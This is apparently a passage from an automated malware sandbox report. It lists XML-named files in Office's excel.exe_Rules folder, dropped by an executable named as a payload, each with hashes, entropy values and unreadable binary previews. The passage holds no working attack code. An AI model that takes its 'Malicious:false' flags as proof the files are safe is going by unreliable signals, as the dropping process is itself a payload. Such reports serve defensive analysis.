                                                                                                      Preview:<?xml.i.'.I...@a`./..l.Z.DK..:.n.o.A.oiu.w.4.m).K..B....YH+.w2}.5..K....Q..<..8.B..}B..G...J/>M.Fe%,....ur\...6........S..?.....fB...H..8.....uK..F.....Qw..V..LY,..0..?..g.\.t..s....[...d..l.wx....x.#.,7...@...Y.S.1m.u....d.LG..O...p.....*..#...:.WXp..]).. ...b.K.:.Z~.6b...P.X`Z..M..y...x.$5.^.]o.i.?.&.l.|..Jl..w..@`O5..<.+h..#3,.....m..F.r..|Q...F.....n.^tpuJ.Vj.\...8...U._Gh^.T3.8.2Om..nxr."...2)."L,. s....X.M.Eb...*,\*..8.7z-5.\.x..Kp.o:.w8G.Y......5..-n..1....).....;#m....|<mOb.......T.}.f...g.i..2.CYb..|a-.Y1.9..R....Li&.6....DkKt..T.. .E#{9=.......r.\...\...v..aa0*....L..d....\.h...J..*<........H!...G..$5...o...ik.Q..]hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120668v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):802
                                                                                                      Entropy (8bit):7.733123418064044
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:hcqT3ScFhZZStORJTzBLv7M2scSA2ak8hhJ+IZv6bD:hTdvZ8tOj17M29DICwD
                                                                                                      MD5:97CCBE110267569B0BC2F06EDC9F3FCF
                                                                                                      SHA1:D1033EBA01566BDB0D29097E689B903460F3B9C5
                                                                                                      SHA-256:3214BBAE884D70E9169BDFD2409CE9EAB203F9673FF5A105984F542EB5CF28D6
                                                                                                      SHA-512:3DB4658EC0EBB2549EF0E508B2C3D0E73BEE3927839B7E3B2E4FBE3D5BA2F977823578B231C21E47751B3ABA559564CD6FF2A4EC4027549A470872B8D052D41D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..f.3B.N..$[..t.<...S.R..../7.9..j.M#..0...%)........g...pl.<d...R.....n.?.q.<.N.I.....4......e.HG.{..EL;DG...".S#.....Kbd....+.....S"..|vt..x'W...Oo.......11.....*v...b..Ddi.q.E.>.....:c!...7=u.Tj.8Cmz.#..../.A.=9U....ci..S .@...6...`...;.....LFQw......l>x~...f..Zs~K..2..Y._...S.3......rP.<f..).[......r ,5.......&......t...[n{..Oe!....3.quP.*...>F.K...#x......M/U...._.e..[..&a..#fO."..C'e'..+...^N..TlJ.e..{.C."......o...k.c1....}.*.......Ka.w..:.p..[..j..@....{..{...`.X.#..:..j$EJ.w>.@.d.XJ9....A.M.*.}..'.....F...Si...=...}vD.JX......i.}..I..y7NX......R8.c.....D.K9o...k..,....b.J]n..~....8.g0..'...t.5;..C.X.*...7.y..8.. j.[W...`O.X...g..2+...E.."U..;.qV.m9...Z'..e./.PhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120669v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):749
                                                                                                      Entropy (8bit):7.671253427609205
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:NLy7f1OmJ5LXbbdaxtGhXOJvevQEefDQhYjCLz90MS+s3ji+sgEHsBlX4Cbq3KeA:15id2tW+MXefDokCv0+s2+sgEHsBlouD
                                                                                                      MD5:66706E0F770702B8BA6EE9D2E796B201
                                                                                                      SHA1:7ADA19E1678104821A195FF1BD58DFCB0CF2DFCA
                                                                                                      SHA-256:E71AC67DB8BCBCD669B8D59CF635701177B937D8D0AA7A4339511FC8AD886770
                                                                                                      SHA-512:9C40E9BB04FEAF39407D44E0E8536CED6E83F300D8847165C37C3989E3DB608030BAA2B5325DF90894BE3A023EA5471BC0BD51BC0F1EF157AE833CB14820CAB8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlS...'=...'.9d..1.....O3CD.m..R.L|....>.f&w...V.....6}.._.%..t...Vf..n.....M..p.."k&...B..a....%wne..^..j..!..$.~B.=s)x...2......w...,..s>.xq.F..{.X.*Jdl.$.^.*.....'.b..Qw....zK...U/S..4.7......T.@...%.......f|{&..G3[>..7.H.Q.m...N..&.l..us.b.....d.}..E.B.....A.h.~/.R..E..Q......D...7...FN..8x|.....;_..:.o).6...-..s..~x.R._..m..p..+V...q.....R..m..8...>..^.{f.......q{...a.z.5....G>w.Q.%....YGF.........H..P...H?.J....Ri...j...Z...C. o.....)T.3..TvE...1.p.h.A.R..(.|6.0._t3..,.Q..%...i......s.I.hc".)...wc.}0O.....g.$Q.=.o.b(n"Fn.5...8...bU...`.q.A_.N.~.Z.[.....i....4$Q7..G...'?X.5-./....t.5P6...Ep.*.sr.K.p!.r..N..X-.^.....Z.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120670v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):805
                                                                                                      Entropy (8bit):7.777417567887631
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:FvTnsi1MAPoNrZUiwTjZNTu68fMtt4zYILgBB6mHTPP/lGQq6N/qv6cii9a:FbnsimsPiwnbTgfQ4LgH97nlNngv6bD
                                                                                                      MD5:3B95C9A87A67B08BD291BFC296D87EFD
                                                                                                      SHA1:73557E64FDF504AACDBCDDC5003BA39076C939C7
                                                                                                      SHA-256:8A67D684EFA27C4AD84A88292BC1BD1843DFD04EF1FA49D922ECD8AE02B3210D
                                                                                                      SHA-512:604A37C307DF8805BF026085EA8F8A1700EF529BE4FA28375E5D7D2B30551CBF4580BE861DB7FFCAF05BCFCD30043DBFB2F7B13A6FA20D6D2F75BF3B0AA173A2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..B.0~..x...FW.....Hv..9Q...@,?..#...A=.v...CT.pp.]...Z.8K...c..1t`....#F......j_...e.8.......6........."4......Z.f...r..."...2.4..h..xZ.O..Kxc.l.!..s.HO0..i.N..Z..F..lgM@.~i.....^......^...8.Z......sW.A..h.k.t.I{.ao..n#j.i....W./: NQ....e.*..k.....e9..6....b..wnZ>Gm...e.;/...fmw...Z._=?.i:...._\A2..Q>..y.Z..S.&.I....Q....o...?P....s.B..........P.nL...0.....A./....2&r....N.>|!..|.E.O.r......F)X.z.e...[m.V(......$..t.$U....).(vb3-u@.=N3c......P...!...3.J.i{\97t......m.*F..$.....uw?.u..#....a...."+...#d:......_...|.q... vK.b..O..O...?{j.V../..}..]m...../..;...+...I.1v...^/...V.!.;..ySd...........w.,.t......`|A.b....M.u1.\...(X&i..RU<;.3......oP_.l..%s.%.....M..{.aJ.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120671v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):765
                                                                                                      Entropy (8bit):7.701964981054544
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:42x6f+nzdUDWCEzgI0X8i5mDmhQ2XBEfnWgjxXDTIUoeNnfLBIdU1v6cii9a:4W8+zdjhsII/mDMXBE1zTpDNnfLq6v6X
                                                                                                      MD5:5C1EF66597CCDC1706B78466F6C71309
                                                                                                      SHA1:F7DEC71413013BD4FE049BC84FF49DF350F5CD5D
                                                                                                      SHA-256:A39B171E893A0CDD4F52CB5186ECDD4E808C201961C5BE5EC3BD57D297DA10AF
                                                                                                      SHA-512:B92C3CD455E8299A553C4364315BCC2A50F64C95953F56AAE160F53D27B0EE827025D8A839BA6A9173A751FA0C366C543558DBFA440C4437CDDB4DB9B8A9D8EF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..e..d......[......[B.^..d.p4@.......]...B<.....Uh .t.qe~1..t."k.I~}.\&(ju.+6..aV..y.;"......)..;..........xc....&.w.3.]l].P.B........i.eq....l.<c.>..Jn;3._.k...[`V..........S..F.Z).9..d..7....8......|..pUwS....>.. E&...|4p=M._6.:..i\z%..F.7..".y..b.(...#.....P._.\.5.......r <.oh.}./\0r.:C.wB.K}..0#...{(.K...R8.R.$.+.q>.!.B.<...Kn....6.B..|wjo.....x.).w........2..3....5........s..e.......=!,./N.b.h.{{}..q).n........0d8............d....".c+|b#....Z3.XZW.,...(v8...T..vn.*....7..z...(...,..\Vh.=.JC..S=....45J8L..hE......8.....k.(.o.UN@.~";).m..\..}Z....Q3.Z8.~,.Uh.K.....`......._.'gp......^Mq.R.I!.N...O9....J.....B....m.>....,R..v[{a7..b...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120672v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):808
                                                                                                      Entropy (8bit):7.736776967596154
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:hzw9NpZf2D71+LEu4ozqM1q3HGstQIuv6bD:lWjZf2/uzqM1q3mstcwD
                                                                                                      MD5:83C14C4C5B792160013B187F68D23320
                                                                                                      SHA1:EFA78C63FCC630D1D37520665E8C96841352B3A0
                                                                                                      SHA-256:8622AEA17C7AAE04FE2E7FD5EC4E19C577C9628781431106D345F0427781EF6C
                                                                                                      SHA-512:BCDAA3BD5B9AEC48D31509DED6A2A0DB63E671E8654CE7379E6EFC7D8DBA7B45DE70D973B0F3C4AD124C07941C57F19143D64A1652C3EBC55B5966D850F8F9B9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...M...8T.H..........k.......G..8.UW........]....=`4b;D...FI..D...h.K./.Tk.I^.*...^...A.......?8...J:.lJ......-.....>........;.......]x6zg..L.U0(iT....FL"n).u...c7.*.{.S...5U.@>...t....J...]Ce.8{.+....yJ.i..G...q...T.IV.D...c~.gR)J.I+~g.?.=.VDq.....W# .e.rK.lL.k.C..]..!..p...cbv..c..e....G..d...g/...U.....>.../!...Z..$....[%......R..o...F=.z[..[.*.L....x....c+=.E......nLb,...MX....mE....7.....R......HV..S3HR...<I{B<z./..twn..r6`.R.!..5.AD&...M>.....Z.?...,.o/..SYN.2Z..J.....c..L....u..!.......$.}.R...P8.9....0&>.{.S..=.0.M...r.%}.;......Sj..pS]..D.....BV.n.Y{...c........X{....i...X..;...;..;e..._.N).8.......q.y.Sm...P..nM...FWA.2u+=_....../.......%."...W..52W..pi......)K.....jhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120673v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):760
                                                                                                      Entropy (8bit):7.694931966395637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:qJyqqaXhdT1gaVLL1fyXyfpwhqYGGXO/cnq4n1ato0cM3onlrYDv6cii9a:GyGLRMyahqYXXOcUpcM3arYv6bD
                                                                                                      MD5:291BB6640E5DF9380EA854416AF8DC5A
                                                                                                      SHA1:2D304C645AA1F031038CD113141A98A1AC62F36C
                                                                                                      SHA-256:41CEE64F291386358842274A4A943FFD94D84D2749D788B9A058EBE4B8920E73
                                                                                                      SHA-512:C6D997D30C98AD8A6F39FD671F1F1CA699D898FF67F050CE6C2FDC3D1F0E62FAADDA6A021174A67ED7C54715C52943FED9CD0B290420CB766E0C6B5568198AF3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..%..nd...D..+Qf\...9&p.).t.......[..^...9....i..6$W.,y.3O.n(...%d..J.....:@..s....*...+..[Db..W..xl..?....D[....+..f..fx.c2....~...:..R..@[..@^.Hj..Tr..R...G..cKC.....\.f.....0.g ...%.<)@?.Az...9.....X). .....2.b........L.UC.=.......~.sm@T.K!......Pl.ujD..%..../;..(.+.b..C.|1.i.y...Jm..Ad..W...X.A....^.X.=.`.......FHR.i....P4F..... >.~....=J@....I.eW.3....\.{@D..7...S.q.*.1.X..Vd.5.....Iu.tj.Vf.Tw../..<M..d....A.}V..&E...../I.6..v`.[M.W.-.m.51....|.E!4[.x=.\d8....k....q<>0*.k?3..Pm..4B}.>\.. ......{.}&...L.........F~s"..~<..LZ..$..x....S.}.u..].vk...|.V.b@U....8...Gi.k.3-..&.05c..z..Fg2&.m.....:.]..T...f...:V....;<.N..%..$.......<IIhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120674v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):807
                                                                                                      Entropy (8bit):7.688072304328961
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:okaPPu+G6274TdMZN2+c6mFo43PH8v6bD:sPP/274TdMz2+7f4f8wD
                                                                                                      MD5:01239D9278BB478CA3432BB6DBF4585E
                                                                                                      SHA1:41283AF1EC28A5EA272B876F0DF957CBC7D4D295
                                                                                                      SHA-256:C3098BC6509FCB211247D51745B3AA4C1D254F7E5F58CCDB4EBDAC4845F51BDD
                                                                                                      SHA-512:468646C9FAD3F66A0825E49DF8C4D480F3B7122B256E925632994FEC36BD75DA6AF5CB51C3B1B05D684503AF3861DA6E2A40CE6F2E3D99C457D6280B64DFD73E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..9ioZ.l9...N.....Q..v..p5p.&..~.X.AF=...#.L`..;.{X.R.1..v....v6.C.....e.3.-.$.).p...PZb.u.|.I..O..F%....2.B..(.....Y-...{8*..OZ...@+....Na..6*o...\1..K..e.=A2_U{N;Q.H>.V.....E...L.y.............X>.i..X.+.#Cz.Y%aI.a.D.....e.0*6XE....D..._....8.+"...Xp..R..P.yT.&...2.........V.0P..o!w.D.$.$a.y..8.Sz.U`"..'.-.v....]......Q+...0...t.=.....@%.f..Jd..B....CT{..n.1u.M..p.HgJ..G..`%<.y....B..}.t$2...O.6.....F.-.X&.7.<.*..}F.L..(.v...&[.Kx`..Z.......UP..,?2.gS.sJ....sp ;x1.>Al.k......9".0...9.<i...>.[ .i.A... Gn..9..,.......0..3M.z^....].....d0"...($i....m.N...6...gb...39....a\I..:......l....x....o..*.y...Vjj..fE.O^....i.o(.g.........*..3!.Z.|.!..RXl.~4|.1.zewg....TC_....UA..e}...I.L..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120675v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.7510114028939086
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:A/FGo/JpLbWE75w92R2S6WkoieQyz/XJ0GR9aA6/n/iTNJnaW7p1/sJ7vvWSqAS5:AAo/fL/7BkoLQEawHnae1UJ7v+dheVvk
                                                                                                      MD5:624E027D9D7FC63CF3D6CF26A4617D47
                                                                                                      SHA1:C381844D7A2ADE3B30086F671E2E005F28636216
                                                                                                      SHA-256:2605D2074445B742B57127125144FCD33EBABCEBF05139DC598B09875EFD564D
                                                                                                      SHA-512:E7F5089D60A171BEFF2AAE559836565F0EF16811C0FEA7769FF2551509D8AF130231BFE7A6F726763B127A44BD51E2F80FD4C444A726CFAB9542EACF0A6FE1E6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml=.W.2.........s/..%.../..0.6Z.o.;...O.$._..o.X.w7v.........=[..|.....^6 .....N7l.....F....:,al ..D........1?..z.o.h&q2NN]P..dF.&.......P5.v...^....Y...... G\T........'&...}...#f".`<....Y|R.*_.5^..Ns..vs\..g.{+_..p...;.........9.Z...sK7Q:.9..LfY..R......juL.A......,..k}.:B.S..m:...6.y..E.p..p....|.@../.=!..e...e1..0.|y.^K.^+..U.}...C.ZH.9..-.....Y...9I..}..sE.$e.q...+..8.} ......I.T.........)3.%[>....r.=j6...z..4.+.t@.3......3.......2hx.R.a.8....7<.....,....&...0..80.@.0tvD:..8..F{6Ki7......P.`._yP.=....!.E....7...v...}.(.*.3.......7.%...$...'L.i^.>.........T.NrC.....);f3d.H......./sJ......;USgx...R..%%sV...+f...(....U.W..N..,...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120676v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):805
                                                                                                      Entropy (8bit):7.719471503001351
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:VvUZjTkAb6YKRj0hRkgX+Ryrvekkw0v6bD:R4blEyDOwvX0wD
                                                                                                      MD5:DE55486E657122F12AD850069F9412FC
                                                                                                      SHA1:1A170769E40EE6390D00A8073FF2B728E0FFB7F3
                                                                                                      SHA-256:5CDFC810C9921F21E86B350A11F244DE8D73CCCB94F725F139B88AA41D954D52
                                                                                                      SHA-512:EF232AC659BA21911BD9179A9DCFEF6D4486FADB17D9A1A2C37C26DC290E2406EE979814A09BD1A207DC452EF290907F2A0AAA5DD3C65D02629010A4BFFF679E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml?g..b.aq.M.....D..m/....~.,pQ.D..v...=..$..`.~......i.<..A.lh.).....Z...(V....\~.../Y....N[....&.8.w....a..!.......II9.G...*.0J.U.E......~..`..F......6j..o..#..[.G.NbPE.yi.K.p.C?.........>F;..?..............xa.I..n;f.R=..g....M......?#xc3,..K.g.$.o..<..6...........T....6.;1t.m[n._-9B.'....KKS..O.DZ.y....w...kv./'-.K.g.d.yQ.o=M.C|..&.U.`$...!....u.Y..%...N0c...H...Z....K....dMy..|.....+V..}.....Hf......,.P].\..|.....MGQ....n.|......}..3.......O....a...k.[....p.+..b.DJ..y4..stY.7..\....%.l.I.....Xw\...<.L..N$.z..9..b...O....ER%..m<=>...=KZ...U@.D.s+D#R.j.O..<.....r.5.._&...."@o.~....Y|<._N.$...P[..D........f.v...}...U.&;.6.=...}.}....W.R..e.....P.......}.GV8....m...&.._.,>.....K....F.v4...-.".hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120677v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):738
                                                                                                      Entropy (8bit):7.665552737256709
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:enW4JTgDgR3Jv2CyHPv4dKAsONxwXiCUTvxoJuovI99MOLizlKecmU98TxAMoRv8:enWuTKgNJvyvQDrtCUTvxpovIkOL8lb3
                                                                                                      MD5:5F7654A0CC7A88B1B2F441EF9A2A2A00
                                                                                                      SHA1:E22238F642523134DC32C472A2D8039CD67FB1C3
                                                                                                      SHA-256:E0D42882C2100DAD4FA6D3BF6DB12152A9D742F6245325AFD1C6EBCF3E0B6ED6
                                                                                                      SHA-512:6129D04D04BD32FB2C16D20DC7F0EE5F8E6C2CA67B91388EC5BEC012CEF7D6900429F5E10CDB6E8E9A4B04347E4A5E6329B6CF945C770DC3AF9D6738822541E1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlW>.D..^+.7....Qpg...:..I..N.....1..C......m.... e.:..|.F-b..........Mcu.C..*.;+.4r.9.:.C.{1..f...fK.$.......F.f.z(..B........n4P..L..'.Ru..;.!...uU"E.../2:....sM.....tG9_.=}..|...g`.g..W'...z5..O....(.........A%.m#*...@..B...[Y....b...y.>Y.....tu.....0...^...#v..5.t.u....7.l...u8.O$O!....|....4.#...5...A...(-*...n........a...5.....+..r.B.%@.. 4.P..J.....+.r...Bd.".1.R.k..~.e...t...2W]B...7.".(....(..Rx1}......... .(.U.m.....j.G~..%......g..K.V..F....?\...-..G.M...h..v..;9N.....E...._:.E...9.Q.l.F]..^.x$>0..e.O......P......$z."....J..N.]..T....]./.[. q...#.xY..."g......G.*..(#qe.%...Y.9a..P.+....KU.9,..G5..kd.4.{.B,hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120678v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):801
                                                                                                      Entropy (8bit):7.732047106285018
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:eJMbI9J49jgl4l24Pe3ZNoSMJgnLJ0EUnv6bD:ey+49MqPcZCyLmEUnwD
                                                                                                      MD5:955A75CD09AFC1A30ACFA31BFFD3DEC5
                                                                                                      SHA1:44E47599E6A87F8ACEA2639D5A399906C60CB1CC
                                                                                                      SHA-256:D51D09FEA93E8714297638088F2DE1BD18B2EC28910A70477846D350D580A5E6
                                                                                                      SHA-512:385E53B23938CAF485855C9F351F2F5548C56C57EFA8E9379F6C8CF5ED666D688AD852E9608EBF3A63D176E86E4F573A212CE580E537AB4F1317D4409FCAD29B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..c..).......xg.e.?w..uZ...m.8..7.F.I~.lG.3.Q.M.w.#.]..)V.......T..j).,....I.9...dI.Z.w.v.0F.d.HE!Q8..&.."&.5..sG..K7......R..55.Z.2.7....<Ka.G....0.g....?oIe..MkpP..6..d.(.qUfJ..#".......,...%..E.z.+....d...+.f[. ..H.'q....<R'.E..:..L8...Y`...^..D..=.2i...K.bT.nQ..%...J......l...B.K.k..Y..f|...D.zBZ2jDw...7. .>.....o....yV[2.d.G....G..A.R;.8U8+".a.9.=....{.]...B+...f.<.....r .3]b......J.}|.....x...........a.-..M..l.e.w.8yJU..h....=.T.'.].B..r..j.....C......i..-.'.7...%.Y.%,..'...R.~..e...s..0.!....NQ.}....(@..9.....aq[0.w... ....K..z...;..n..N....W/..C..K... q.M..p..j....N.h..8.....H..}......U.g...D&.k.."GLP......q..a\%r.U..:.w.........40.u.... G..g.n..........2+-...Y..1#v.....6hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120679v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):507
                                                                                                      Entropy (8bit):7.532106467000929
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:iyaDnTyge36tLmIgrfa0xhVXlFqiGUpeYycZFaU3ynv6cii9a:iyajWgpLArpFUUqcT5ynv6bD
                                                                                                      MD5:9F7896BEA6CF8ADC708A0A5764ECD7FA
                                                                                                      SHA1:D3EFCA6A5FCE8CB5B1C1FC22325A2739E65EE314
                                                                                                      SHA-256:209413E7EE6172843F3BBADFE6CFE89E974019986593B35D5AFCF47B583F8D9C
                                                                                                      SHA-512:C8CA2F71B1EC2FF013294B022089ED00AB963E2108F612A2EDF75490A56F8259FEA8153A65E043C9C9F01A973CDE83EBA7817A833B3722C8BDFD1101DBF0207A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..4j.W....m.F..Gq..K)x.xWt)d._Dj2.m..o.eee..78....laym...-?.{.U...O.P.t...}.u..a.d.54....YL.~.@.f....Q...v...%..g;.k....6...b.:.\.?..t..N43.s..Y2|.d.s.#..g+S._|.l.....H...d...........*.{..8..a.._.m.....I.(eA.Z..#.,i....-...j~aU......h...l..3...j.....ON.B2.!.Df.U.|......\...x05..wk..3l2=L<.......ybL...qTP......Lox.z.9.(!Zts.N[Nc:..-.....<..(&8nx.M.. .F...].,`#r.x.4Ct..?.y....u$zO.c........N....Wj.%hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120680v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2285
                                                                                                      Entropy (8bit):7.916781551860468
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:LtV+ut8brzQPDDxRxxIRpizFnFpd5k+qPlKKo8t0DwD:LtVxerqDjxxIRpnVl1t0o
                                                                                                      MD5:584693ED80DF0053E990DCB5E80EF9DF
                                                                                                      SHA1:B19A463141B4CD18D2D2DE82DB69946453EF3B7A
                                                                                                      SHA-256:04E7C5CD3CA1936835A105908EDD235943FA0D202B5637F6B347A2980ACE7FE8
                                                                                                      SHA-512:1AAD19E32A2AF98BB20A79CDF3C4395FC10E5C62BC7FE6D158939C9F9906561B288256C3E4476BFF086549345C564803E9FBAE9ACB28A8F965FF3F2DC5F55963
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml9...C.eBJ....}...H[<....z=.yo...}d.:...-xb...sP.f..Y.......7............o..1...{r.S.f.}.#..j. juC.Ya{..8O.@S.....N..[km..x.._.........B.x....>j..;Q...%Q3.o....?....zP.6.X:....S1........M....t@...PUu..s..q.a.M9. P.'%....p.~...{.....S...,8.z..{.Ax..I...c....y.w...b\. m.s2y.o...RD.;>8./....."....J.e:.Y`.....x.N..>.k....f....c..{..WD....".d.,E..@.Zz>.......".d.....a._....nEJ.......W'DK.^7&=@..#E.3....'|)..."...TQ.N.a3i....M(....[.2.2.:...~.9Pq...IF."....dgh~.....LrD.....ka7.]...t.'..?...e.e.."..H../.....`f..V..-E..8z.(.'...6.....K..Q...UMmu.R..Z./s.%..{;.?.B...#..\J..\.` .S.;..0O!.R..U..M.bW...o...Hf.<.A..M.`8.*.(M.g....LGM2P.}pX.....r'..l@.C`|ep.......x.E.qv..?.7.v..y.....w.A...L......f1]../...GI........B........o.....<..y.\.b. \5....w....6+V....p5m.%.5.,B...F.ne.`...7h.1q3..D.Hmrf..+..q.^W6..._....6.(TB.=..)A....AD..+W.O5t.I.u...i}B..".g.bo...XLN..l~..\.K~YT...$.7Yg....~,.F..2*.kY.../.N*..O./......a.n...D.4....[.o.=.`....A...$.(.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120681v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1291
                                                                                                      Entropy (8bit):7.839231534400339
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Bl9nJSENXDNkOl4R/AiciJ3M0GVMOxOgKeI0IWBGCMUWVTv6bD:TRoeXjl4R/ADiCZMOYgKcH+VTwD
                                                                                                      MD5:CEF7761081E79D33C91F360DAC8A3BCD
                                                                                                      SHA1:EE044EC1B51361996DB3DB517200A34E1FA135C3
